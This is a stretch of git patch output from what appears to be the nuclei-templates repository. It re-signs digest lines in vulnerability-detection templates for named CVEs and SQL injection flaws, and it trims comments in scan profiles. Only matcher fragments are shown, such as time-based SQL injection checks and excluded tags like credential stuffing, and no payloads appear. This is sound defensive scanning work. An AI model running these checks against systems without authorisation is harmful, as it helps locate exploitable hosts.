-http/vulnerabilities/wordpress/wp-statistics-sqli.yaml:e09bb5a114d2c257fa26f165e598c42ac20ecb07 +http/vulnerabilities/wordpress/wp-statistics-sqli.yaml:629d5b29ea40a1f03991826003b7aeb88c2e9896 http/vulnerabilities/wordpress/wp-super-forms.yaml:e828dbd896c649b82e4c7b47c312a852d3024309 http/vulnerabilities/wordpress/wp-superstorefinder-misconfig.yaml:73d5fc4e0f5d94a04d92fe7239531cd63e8912d8 http/vulnerabilities/wordpress/wp-sym404.yaml:3f6e3c01091b8b7a2520eb2d950759a682caa998 @@ -8551,7 +8540,7 @@ http/vulnerabilities/yonyou/yonyou-nc-ncmessageservlet-rce.yaml:2d4415456f2647e6 http/vulnerabilities/yonyou/yonyou-u8-crm-fileupload.yaml:1dc3dc257a37960cfc7f288764e3299a99097e0e http/vulnerabilities/yonyou/yonyou-u8-crm-lfi.yaml:e9e201ac2d626d5305fc854a70b1c11166afd2fb http/vulnerabilities/yonyou/yonyou-u8-oa-sqli.yaml:ad806552bd9cebde1708802b2e820cca481f63e4 -http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:a196df819e71cdd4ed5536e64699cde877970bbd +http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml:70a166c29d52685a7f46607aaf07e18f4cb9a24f http/vulnerabilities/yonyou/yonyou-ufida-nc-lfi.yaml:570802cd60aeaa735352489d41f6ef86bc61fc77 http/vulnerabilities/zend/zend-v1-xss.yaml:05b01c979af3184012ae4a0a8ecfc917eb55b6c7 http/vulnerabilities/zyxel/unauth-lfd-zhttpd.yaml:aeb3591b7d975001b6ac134aafc0a5638821b1b7 @@ -8800,7 +8789,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5332914af0f8a4523a11dd057e40477c4edfc628 +templates-checksum.txt:1135302d10cf3e433920565e86b73e2aab33b758 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4b20e2f1b3e4dbb63f77bc7c74484094170d334b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jun 2024 10:24:38 +0000 Subject: [PATCH 0607/1841] Auto Template Signing [Tue Jun 25 10:24:38 UTC 2024] :robot: --- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2021/CVE-2021-39165.yaml | 2 +- http/cves/2022/CVE-2022-22897.yaml | 2 +- http/cves/2022/CVE-2022-4049.yaml | 2 +- http/cves/2023/CVE-2023-0630.yaml | 2 +- http/cves/2023/CVE-2023-28662.yaml | 2 +- http/cves/2023/CVE-2023-30150.yaml | 2 +- http/cves/2023/CVE-2023-39796.yaml | 2 +- http/cves/2023/CVE-2023-43374.yaml | 2 +- http/cves/2023/CVE-2023-6360.yaml | 2 +- http/cves/2023/CVE-2023-6567.yaml | 2 +- http/cves/2024/CVE-2024-1061.yaml | 2 +- http/vulnerabilities/other/erensoft-sqli.yaml | 2 +- .../prestashop/prestashop-apmarketplace-sqli.yaml | 3 +-- http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml | 2 +- .../wordpress/wp-autosuggest-sql-injection.yaml | 3 +-- http/vulnerabilities/wordpress/wp-statistics-sqli.yaml | 3 +-- http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml | 3 +-- 18 files changed, 18 insertions(+), 22 deletions(-) diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index eaeabdda5e..0d48f5a430 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -52,4 +52,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4a0a00473045022100fcd5207100a25aa6acd80942d2d62778a16671bd660cbca07d14fbd2f428866302203a50b15dd5bb3baa63c92c70557e4decd1922f775ba2d5723d9c48d52600cd0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206afe631ad8f093e0e82bb2d01736518d96616950971ac077d2ed68d07fc2209b02204867eca23d5337e9b83cb4066ed5a73d791aa434fe9f29e1b1f4762ae55b7368:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 280d635a49..71a29b1fb2 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4a0a00473045022068741ea24b809bbe7b0808375c237dc88233f8558be48aa5f2a5267c9b309194022100ec56309db868de2bc5d68b88832f2313b46ae7b792ee6e338c40e61c39568b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d446c3957624653dc008a7ab15069eeed694d1099c94c6c977a81d0102dd05a022100d4e4d4f86b4d2f06d8966f18d607297ad2bc92f0fe4a9083ec4da8b419a74743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 19635ee5d3..7557778a5a 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -92,4 +92,4 @@ http: group: 1 regex: - "\\s*\\s*<\\/version>" -# digest: 4a0a0047304502207c0cb2e876172f6211d6fcb96032efbe0dd66aff65e487c755e8e0ff7f2ec891022100de0684da9de47c45b49e8d5fd0d27431496f863244c33bc5d1c1a3805bb41447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220404a04d873dd736566bf6f0c9313b4d2a0d7c8e86ecfec5bc6b30d01e096410e0220291616c6bc77a2be23fc7cb703dfc36eeefb0b003aff6a127b0b6ff6eb68bda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-4049.yaml b/http/cves/2022/CVE-2022-4049.yaml index d3d883709f..d7de9e0abc 100644 --- a/http/cves/2022/CVE-2022-4049.yaml +++ b/http/cves/2022/CVE-2022-4049.yaml @@ -68,4 +68,4 @@ http: regex: - '"wpuser_update_setting":"([0-9a-zA-Z]+)"' internal: true -# digest: 4a0a004730450221009f2cbc14364ac05c5c2dff254226127506c3190a3ba76512afa101ec3d1ae79202207ff986195db0fe3402ab65772f29a6041fce7ff6bdc78a81bee06024b9aa4fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220417702a400fd1470847b7a56fdb39c617f098d7ed940760e3bb90b640bffe63002201d2a1c8c55e65250c9a448859cab6a74566bed58996488676a9e4d7bc97113c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 64fa55a26b..6fc2d09aea 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "application/json")' - 'contains(body_2, "audioShortcodeLibrary")' condition: and -# digest: 4b0a00483046022100ee61f22a1918e6a9198b81991818592c4981a6fabd8b5a895193a6dd70cc1528022100ec8b1623dc9206a446c7ae05f336e019ef9b53de9773c86a6a21cf25835b2d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044021f6e2917d0061143f7ca84ab20e377a2d11b3570e0dba465c62353760ed595dc022100e0d617a6ee8a225a4703bbe89d05b0453dc8b7c3ced1a6bf01c23ebeb744d6ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-28662.yaml b/http/cves/2023/CVE-2023-28662.yaml index 42e5d54133..77b6da0e2a 100644 --- a/http/cves/2023/CVE-2023-28662.yaml +++ b/http/cves/2023/CVE-2023-28662.yaml @@ -61,4 +61,4 @@ http: - status_code == 500 - contains(body, 'critical error') condition: and -# digest: 4a0a00473045022100afa8558e60f3a24e5c759b1c66eaa53fe541909c23b8a9474cd83859af83a17402203bd5c9b2dc67d75e6a403a686a29689ed5be4fc63294981c5fe8107ca0a8275b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5944d195a66cc992aa9390c7b6af64403ba94d5415a81b46c6e677979a6341302201fe366b008369ca7e2ec4a8c9d37a12ad2a6c12a4080682b3edb135e95b6e16a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index f6228dfebf..55854002fa 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -50,4 +50,4 @@ http: - 'duration_2>=6' - 'contains(tolower(response_1), "prestashop")' condition: and -# digest: 4a0a0047304502210086e5803369de03399b175dfff1f307f08d600d62f63e9173feee293e5989703702202117112bf80dd12f3b62170d2bbef25c52244259fca3902e92b9a05a70fd8a91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022011436dec9a2d9050fdad5fa5fb5eab94a81368c72adb441511e52277343542fb02205ec6412fe803d48ca0dfb890c0cce9d37a4bfe569111aa78640700f40141575c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-39796.yaml b/http/cves/2023/CVE-2023-39796.yaml index 08c6573329..fc0d426099 100644 --- a/http/cves/2023/CVE-2023-39796.yaml +++ b/http/cves/2023/CVE-2023-39796.yaml @@ -43,4 +43,4 @@ http: - 'status_code_1 == 200' - 'contains(body, "Record deleted successfully!")' condition: and -# digest: 4b0a00483046022100bc6387053a528f5da55af6a431c8e8a7256148c4be5ce8f6dc5db9b3b8974b1f022100c4d7d900752e413d2a79cff723d5e88bab601eade61c0ed12b050cf87dc10a85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce40215e4d2fba5acf81c684dc93363c17955c178d0dc4777c89c2472b627950022001713b9c40f260396785c78a21cc5a79ea88f38878a20155889a29ca0db1f63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index b8a0aa7316..457caf0f3c 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -68,4 +68,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and -# digest: 4b0a00483046022100ccd06c1d6b4afb0e01163a001a2c7cf4e28046454d7905bf5949f6076f999cf4022100acde6da1ea9ac5fc9dba22d88202661d83f7dc21e59d343a1868288df0b8b79b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ed2d51a5b859e168d3fc27ac78f51230ab105242084cf9831ea4b902476c839102206db1002120c87c478ebee22051057ab49b28ac5e09ce3df92c36d34fff1e7e6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6360.yaml b/http/cves/2023/CVE-2023-6360.yaml index 06a839dd4f..0e6457a04a 100644 --- a/http/cves/2023/CVE-2023-6360.yaml +++ b/http/cves/2023/CVE-2023-6360.yaml @@ -59,4 +59,4 @@ http: - 'contains(body, "[]")' - 'duration >= 6' condition: and -# digest: 4a0a0047304502201fd1abaa8be5bfa95d08a60c070bba83152dd6af7bb3f970cad559258a3845fe022100b62ff3a35f50dfcc31b2020bcf504f427420cd73bf22530a4ce7220886732cf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080f9c2ede571048e2f8acbaf7af48468610fbd2253f1414e4e3a9f73fb29bf16022100bf05002edd254c544cda4ac242a91025fc3dbb66758232a6e77f523de93224f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6567.yaml b/http/cves/2023/CVE-2023-6567.yaml index 280685922d..7f3321d876 100644 --- a/http/cves/2023/CVE-2023-6567.yaml +++ b/http/cves/2023/CVE-2023-6567.yaml @@ -46,4 +46,4 @@ http: - 'contains_all(header, "lp_session_guest=", "application/json")' - 'contains_all(body, "status\":\"success", "No courses were found")' condition: and -# digest: 4a0a00473045022100b53e35f7ae7569acb1bda7d05de5b75012a7ea5d1eb74c3111f8dc5eeca6efb3022020b1e830c63e9643fa36e745f1a77cf067f43f4fda85cc07997cfe278d0d470e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e93a6bb45c0bbe33f02031a844f058505d49404e5fd5f822c7d38561d3cd5ad022016b9afb03f037ed05d1ab8589472724427c817f32168f420c16c69c7955bb92b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1061.yaml b/http/cves/2024/CVE-2024-1061.yaml index 51f07678f6..cc63af51a8 100644 --- a/http/cves/2024/CVE-2024-1061.yaml +++ b/http/cves/2024/CVE-2024-1061.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "application/json")' - 'contains_all(body, "created_at", "video_id")' condition: and -# digest: 4a0a00473045022067b13f93f5ef066473b8b51c46c6a613f73ddfbe77905aadaf2241b6d9c09263022100ba7baef034c81bce2b183e7abbdbec4b6dd0044f5aecba3a2bce8f4a0bc32481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bc9330743b2ba8e6430fd774e3edf739f4ce8503012c09069b49bcd1f0a4105f022100e3ea7db336d5b628198a71833e400f2c141a061fc25ff9120a4583b33c23988f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/other/erensoft-sqli.yaml b/http/vulnerabilities/other/erensoft-sqli.yaml index 95cc77b38b..e1c9bde1dc 100644 --- a/http/vulnerabilities/other/erensoft-sqli.yaml +++ b/http/vulnerabilities/other/erensoft-sqli.yaml @@ -33,4 +33,4 @@ http: - type: word words: - class="entry-title" -# digest: 490a00463044022072d8bc1d7a793f83426800db9bc96f9f423ae26db72dc6284707e3628fdba41402200cbe475dbc83a896de18981e835e2bf65c9c3dc4a17a1c9178e64c1ce50dcd32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fd8f2987ba3c3b57ba87203b113df644770464430999869c8847a469611abf9702210097830aa604d30884f54b8858843b5dc28239e46cf051564a650069017178c103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml index 33267bae1e..49d9432959 100644 --- a/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml +++ b/http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml @@ -32,5 +32,4 @@ http: - 'duration_2>=6' - 'contains(body, "module-apmarketplace-passwordrecovery")' condition: and - -# digest: 4b0a00483046022100b48440bd6c3340453db529a4aa26ebfc2720ca154ed673b86253139e316d9fa3022100c353a472d66ba11b085155b28ee58f92dce4988e04ba847f68aefa70fd759a4d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203e76a36993ea8e5483ba55aa5d7e5a3a53186239bfe398154c494e16408f55d9022100cba87aefa2e35954936fe3d80503cb55fae7199c55fd100625c1648c022c73ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml index 3d22b7d2c1..e9430ddd05 100644 --- a/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml +++ b/http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml @@ -35,4 +35,4 @@ http: - 'status_code == 200' - 'contains_any(header, "bb_lastvisit", "bb_sessionhash")' condition: and -# digest: 4a0a0047304502201db442ec9d8d22a15b74082b5237443bbf2525ac0e7b358e5dbe7bc403860dc7022100dc011980de800db5b51a45a2299e911158db7ded34b3cd3c64e0d35ccb61d976:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d7d813de0a8693f99f263f8ae3c471a1df83a3d66ed24996d00c9ed53e925b40220550578abe298198870bc27ab620d63cc010feeefecf6f39a3d1c165c206189e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml index 27ba0d61b1..d62895a93e 100644 --- a/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml +++ b/http/vulnerabilities/wordpress/wp-autosuggest-sql-injection.yaml @@ -29,5 +29,4 @@ http: - 'contains(content_type, "text/xml")' - 'contains(body, "")' condition: and - -# digest: 4a0a00473045022060417b5ebdec2ec0103ca4f4228b756927a5690e6fc099a7e4c37d7f2d0ab65f02210091f60ecf3280dec392b74b837bf8b91cae3f0ce21f5820f9af5c3f2e7eed0683:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b4f4ff6fb2239ec707657d1bc296a090c73b74dd6c3ff9527f28147b8a68a6c0022100b2d0fcb290a8d24083340cf31e35243ede7ef10dc17fe8f2d0569c575cdab3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml index 43b4b4394f..3fb292c2fb 100644 --- a/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml +++ b/http/vulnerabilities/wordpress/wp-statistics-sqli.yaml @@ -43,5 +43,4 @@ http: - 'duration>=6' - 'status_code == 500' condition: and - -# digest: 4a0a00473045022100f4da8a4fa639e345d1927cec57054b9caa885d24d795fd99b7143bf9c351f10d02204a18fb4cd911412a0d3c77b4916424c8d074a3840c36664e57f8ac9f039cee9a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207ddca08142915363e9410129de63cd4dec2f952c6533ac90242e302b8b04002e02207cc6810c8ca39fc90e82f7419ce5a9ff8f48a48ade72f110dddae015746500d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml index 8502df050f..f907b9dab1 100644 --- a/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml +++ b/http/vulnerabilities/yonyou/yonyou-u8-sqli.yaml @@ -45,5 +45,4 @@ http: - 'duration_2>=6' - 'contains(content_type, "text/html")' condition: and - -# digest: 4a0a00473045022100ff26707ab7b707eb63657075468f8fb5c9be2587a852c61a038cd6e74f11d80902201a654b27bab1bfb591f1d1cfd0517a439d2b61b67636eff6fac15f5091503614:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018a831ee808815f7db76929071f0abf9cbc87d7f1cb1a3bde8b7ca207ca63989022067bb75d7338132fe1d67b812ff28e436085abcffa761e98ea2337410cb5f8150:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b78ce4bd99c6b3cc6cbb40787c311b2260da86bf Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 25 Jun 2024 14:25:43 +0400 Subject: [PATCH 0608/1841] updated profiles --- profiles/all.yml | 8 ---- profiles/aws-cloud-config.yml | 6 +-- profiles/cloud.yml | 7 +-- profiles/compliance.yml | 23 ---------- profiles/cves.yml | 7 --- profiles/default-login.yml | 6 --- profiles/kev.yml | 4 -- profiles/misconfigurations.yml | 6 --- profiles/osint.yml | 15 ------- profiles/pentest.yml | 14 ------ profiles/recommended.yml | 77 -------------------------------- profiles/subdomain-takeovers.yml | 6 --- profiles/wordpress.yml | 4 -- 13 files changed, 2 insertions(+), 181 deletions(-) diff --git a/profiles/all.yml b/profiles/all.yml index a8da13bca9..1f9ab20aa1 100644 --- a/profiles/all.yml +++ b/profiles/all.yml @@ -5,14 +5,6 @@ # Purpose: # This profile is focused on identifying a wide range of security issues across different types of protocols and services. It includes templates for HTTP, TCP, JavaScript, DNS, and SSL to ensure thorough coverage of potential vulnerabilities. # -# Included Templates: -# This configuration references specific templates designed for comprehensive scanning: -# - http: Templates for detecting vulnerabilities in HTTP-based services. -# - tcp: Templates for detecting vulnerabilities in TCP-based services. -# - javascript: Templates for detecting vulnerabilities that are written using the javascript protocol. -# - dns: Templates for detecting vulnerabilities in DNS services. -# - ssl: Templates for detecting SSL/TLS related issues. -# # Running this profile # You can run this profile using the following command: # nuclei -profile all -u https://example.com diff --git a/profiles/aws-cloud-config.yml b/profiles/aws-cloud-config.yml index d989770368..3951015d71 100644 --- a/profiles/aws-cloud-config.yml +++ b/profiles/aws-cloud-config.yml @@ -8,13 +8,9 @@ # Included Templates: # This configuration references specific templates tagged with 'aws-cloud-config' to cover comprehensive scanning of AWS ACLs. # -# Configuration: -# The profile also includes code templates to enhance detection capabilities. -# Additionally, it sets a variable for the AWS region to 'us-east-1' for template inputs. -# # Running this profile # You can run this profile using the following command: -# nuclei -profile aws-acls +# nuclei -profile aws-cloud-config code: true # enable code templates tags: diff --git a/profiles/cloud.yml b/profiles/cloud.yml index 30ca16211b..0446d9bc6d 100644 --- a/profiles/cloud.yml +++ b/profiles/cloud.yml @@ -5,15 +5,10 @@ # Purpose: # This profile is focused on identifying security issues in cloud environments. It includes templates that help detect vulnerabilities and misconfigurations in cloud services and infrastructure, ensuring the security of cloud deployments. # -# Included Templates: -# This configuration references specific templates tagged with 'cloud' and 'devops' to cover comprehensive scanning of cloud environments: -# - cloud: Templates for detecting vulnerabilities and misconfigurations in cloud services. -# - devops: Templates for detecting issues related to DevOps practices in cloud environments. -# # Running this profile # You can run this profile using the following command: # nuclei -profile cloud -u https://example.com tags: - cloud - - devops + - devops \ No newline at end of file diff --git a/profiles/compliance.yml b/profiles/compliance.yml index 544a1958f8..2688f3799e 100644 --- a/profiles/compliance.yml +++ b/profiles/compliance.yml @@ -5,29 +5,6 @@ # Purpose: # This profile is focused on identifying a wide range of security issues to ensure compliance with various security standards and best practices. It includes templates for detecting misconfigurations, vulnerabilities, exposures, and other security risks. # -# Included Templates: -# This configuration references specific templates tagged with various security-related tags to cover comprehensive compliance scanning: -# - misconfig: Templates for detecting misconfigurations. -# - cve: Templates for detecting Common Vulnerabilities and Exposures. -# - exposure: Templates for detecting sensitive information exposures. -# - default-login: Templates for detecting default login credentials. -# - xss: Templates for detecting Cross-Site Scripting vulnerabilities. -# - lfi: Templates for detecting Local File Inclusion vulnerabilities. -# - edb: Templates for vulnerabilities listed in the Exploit Database. -# - rce: Templates for detecting Remote Code Execution vulnerabilities. -# - sqli: Templates for detecting SQL Injection vulnerabilities. -# - unauth: Templates for detecting unauthorized access vulnerabilities. -# - ssrf: Templates for detecting Server-Side Request Forgery vulnerabilities. -# - redirect: Templates for detecting open redirection vulnerabilities. -# - disclosure: Templates for detecting sensitive information disclosure. -# - takeover: Templates for detecting subdomain takeover vulnerabilities. -# - traversal: Templates for detecting directory traversal vulnerabilities. -# - generic: Templates for detecting generic security issues. -# - deserialization: Templates for detecting deserialization vulnerabilities. -# - ssl: Templates for detecting SSL/TLS related issues. -# - keys: Templates for detecting exposed keys. -# - token: Templates for detecting exposed tokens. -# # Running this profile # You can run this profile using the following command: # nuclei -profile compliance -u https://example.com diff --git a/profiles/cves.yml b/profiles/cves.yml index 9fb0523b57..5354f78499 100644 --- a/profiles/cves.yml +++ b/profiles/cves.yml @@ -5,13 +5,6 @@ # Purpose: # This profile is focused on identifying vulnerabilities listed in the Common Vulnerabilities and Exposures (CVE) database. Detecting CVEs is essential for mitigating risks associated with known security flaws in software and systems. # -# Included Templates: -# This configuration references specific templates designed to detect CVEs: -# - http/cves/: This directory contains templates for detecting CVEs in HTTP-based services. -# - http/cnvd/: This directory contains templates for detecting vulnerabilities listed in the Chinese National Vulnerability Database (CNVD). -# - network/cves/: This directory contains templates for detecting CVEs in network services. -# - javascript/cves/: This directory contains templates for detecting CVEs in JavaScript-based applications. -# # Running this profile # You can run this profile using the following command: # nuclei -profile cves -u https://example.com diff --git a/profiles/default-login.yml b/profiles/default-login.yml index f03ef73992..99a46542f5 100644 --- a/profiles/default-login.yml +++ b/profiles/default-login.yml @@ -5,12 +5,6 @@ # Purpose: # This profile is focused on identifying instances where default login credentials are being used. Default logins can pose significant security risks as they are often targeted by attackers to gain unauthorized access to systems. # -# Included Templates: -# This configuration references specific templates designed to detect default login scenarios: -# - http/default-logins/: This directory contains templates for detecting default login credentials in HTTP-based services. -# - network/default-login/: This directory contains templates for detecting default login credentials in network services. -# - javascript/default-logins/: This directory contains templates for detecting default login credentials, the templates are made using the javascript protocol. -# # Running this profile # You can run this profile using the following command: # nuclei -profile default-login -u https://example.com diff --git a/profiles/kev.yml b/profiles/kev.yml index 6b43543cfd..c17201c188 100644 --- a/profiles/kev.yml +++ b/profiles/kev.yml @@ -6,10 +6,6 @@ # This profile is focused on identifying vulnerabilities that are listed in the Cybersecurity and Infrastructure Security Agency (CISA) Known Exploited Vulnerabilities (KEV) catalog. # Detecting KEVs is crucial for mitigating risks associated with known and actively exploited vulnerabilities. # -# Included Templates: -# This configuration references specific templates designed to detect KEVs: -# - tags/kev/: This directory contains templates tagged with 'kev' that are specifically focused on detecting known exploited vulnerabilities. -# # Running this profile # You can run this profile using the following command: # nuclei -profile kev -u https://example.com diff --git a/profiles/misconfigurations.yml b/profiles/misconfigurations.yml index 6b7c1c6114..069c99187e 100644 --- a/profiles/misconfigurations.yml +++ b/profiles/misconfigurations.yml @@ -5,12 +5,6 @@ # Purpose: # This profile is focused on identifying various misconfigurations that can lead to security vulnerabilities. Detecting and correcting misconfigurations is essential for maintaining the security and integrity of systems and applications. # -# Included Templates: -# This configuration references specific templates designed to detect misconfigurations: -# - http/misconfiguration/: Templates for detecting misconfigurations in HTTP-based services. -# - network/misconfig/: Templates for detecting misconfigurations in network services. -# - javascript/misconfiguration/: Templates written using javascript protocol for detecting misconfigurations in applications. -# # Running this profile # You can run this profile using the following command: # nuclei -profile misconfigurations -u https://example.com diff --git a/profiles/osint.yml b/profiles/osint.yml index b718ce875d..afbe0e3406 100644 --- a/profiles/osint.yml +++ b/profiles/osint.yml @@ -5,21 +5,6 @@ # Purpose: # This profile is focused on identifying various OSINT-related security risks, including exposed information, backdoors, command and control servers, and more. OSINT scanning helps in gathering intelligence that could be used to identify potential threats and vulnerabilities. # -# Included Templates: -# This configuration references specific templates tagged with various OSINT-related tags to cover comprehensive OSINT scanning: -# - osint: Templates for detecting OSINT-related vulnerabilities and exposures. -# - honeypot: Templates for detecting honeypots. -# - backdoor: Templates for detecting backdoors. -# - c2: Templates for detecting command and control servers. -# - osint-social: Templates for detecting social media related exposures. -# - exposures: Templates for detecting exposed sensitive information. -# - malware: Templates for detecting malware-related activities. -# - enum: Templates for enumeration activities. -# - phishing: Templates for detecting phishing-related issues. -# -# Included Tags: -# This configuration also includes additional templates tagged with 'phishing' for a more focused detection. -# # Running this profile # You can run this profile using the following command: # nuclei -profile osint -u https://example.com diff --git a/profiles/pentest.yml b/profiles/pentest.yml index 4dafb859cb..5fbda0007e 100644 --- a/profiles/pentest.yml +++ b/profiles/pentest.yml @@ -5,20 +5,6 @@ # Purpose: # This profile is focused on identifying security vulnerabilities across various protocols and services, including HTTP, TCP, JavaScript, DNS, and SSL. It excludes templates related to Denial of Service (DoS), fuzzing, and Open Source Intelligence (OSINT) to ensure focused and efficient penetration testing. # -# Included Templates: -# This configuration references specific templates designed for penetration testing: -# - http: Templates for detecting vulnerabilities in HTTP-based services. -# - tcp: Templates for detecting vulnerabilities in TCP-based services. -# - javascript: Templates written using javasxript protocol for detecting vulnerabilities in applications. -# - dns: Templates for detecting vulnerabilities in DNS services. -# - ssl: Templates for detecting SSL/TLS related issues. -# -# Excluded Tags: -# This configuration excludes templates tagged with 'dos', 'fuzz', and 'osint' to avoid unnecessary and potentially disruptive tests: -# - dos: Templates for Denial of Service attacks. -# - fuzz: Templates for fuzzing. -# - osint: Templates for Open Source Intelligence gathering. -# # Running this profile # You can run this profile using the following command: # nuclei -profile pentest -u https://example.com diff --git a/profiles/recommended.yml b/profiles/recommended.yml index ea564d077a..9e33a6066c 100644 --- a/profiles/recommended.yml +++ b/profiles/recommended.yml @@ -5,83 +5,6 @@ # Purpose: # This profile is focused on identifying a wide range of security vulnerabilities across various protocols and services. It includes templates with different severity levels and excludes certain tags and template IDs to provide a balanced and focused detection approach. # -# Included Templates: -# This configuration references specific templates designed for comprehensive security scanning: -# - severity: Templates with critical, high, medium, low, and unknown severity levels. -# - type: Templates for detecting vulnerabilities in HTTP, TCP, and templates written in javascript protocol. -# -# Excluded Tags: -# This configuration excludes templates tagged with the following to avoid unnecessary and potentially disruptive tests: -# - tech -# - dos -# - fuzz -# - creds-stuffing -# - token-spray -# - osint -# -# Excluded IDs: -# This configuration excludes specific template IDs to further refine the detection scope: -# - CVE-2021-45967 -# - CVE-2021-36380 -# - CVE-2021-33544 -# - CVE-2021-32305 -# - CVE-2021-31755 -# - CVE-2021-28164 -# - CVE-2021-27931 -# - CVE-2021-26855 -# - CVE-2021-25052 -# - CVE-2021-1498 -# - CVE-2020-7796 -# - CVE-2020-5775 -# - 